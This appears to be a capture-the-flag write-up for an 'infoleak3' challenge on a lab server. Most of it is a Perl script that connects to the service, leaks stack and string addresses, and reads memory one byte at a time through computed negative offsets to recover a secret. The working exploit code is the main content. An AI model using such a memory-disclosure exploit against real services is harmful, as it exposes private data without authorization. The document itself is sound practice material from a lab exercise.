Task:

<span><span>Baby's third infoleak even a tiny mit more even than hard to have. (https://en.wikipedia.org/wiki/Information_leakage)
Server: 172.31.1.38:1614
Binary: 172.31.0.10/tyro_infoleak3_b2d435964aac6bc1098ce62d35cba9af</span>
</span>
Approach:

This challenge was identical to infoloeak2 with the added restriction that only 1 byte could be read with each request and only 16 requests total could be sent in one session. The script used for infoleak2 was modified to meet these constraints.

#!/usr/bin/perl

my $decoded = '';

use IO::Socket::INET;
foreach my $byte_offset (0, 4, 8, 12, 16, 20, 24, 28, 32, 36, 40) {
   
#172.31.1.38:1614
$sock = IO::Socket::INET->new(PeerAddr => '172.31.1.38',
                              PeerPort => 1614,
                              Proto    => 'tcp');

sleep(1);
my $linebuf;
$sock->send("3\n2\n1\n0\n");
select(undef,undef,undef, 0.5);
$sock->recv($linebuf, 4096);
my $stack = '';
while ($linebuf =~ /0x(\S\S?)/sg) {
    my $val = $1;
    $stack = sprintf("%s%02x", $stack, hex($val));
}

printf "Stack is: %08x\n", hex($stack);

$sock->send("b\na\n9\n8\n");
select(undef,undef,undef, 0.5);
$sock->recv($linebuf, 4096);
my $string = '';
while ($linebuf =~ /0x(\S\S?)/sg) {
    my $val = $1;
    $string = sprintf("%s%02x", $string, hex($val));
}

printf "String is: %08x\n", hex($string);

my $offset = hex($stack) - hex($string);

my $send = '';
foreach my $local_offset ( 0, 1, 2, 3) {
    my $val = sprintf("%08x", ($offset - $byte_offset - $local_offset));
    $send .= "-$val\n";
}
#print "Sending: $send\n";
$sock->send($send);
select(undef,undef,undef, 0.5);
$sock->recv($linebuf, 4096);
my $string = '';
#print $linebuf;
while ($linebuf =~ /0x(\S\S?)/sg) {
    $decoded .= chr(hex($1));
}
print "Current: $decoded\n";
#exit;
}

print "Decoded as: $decoded\n";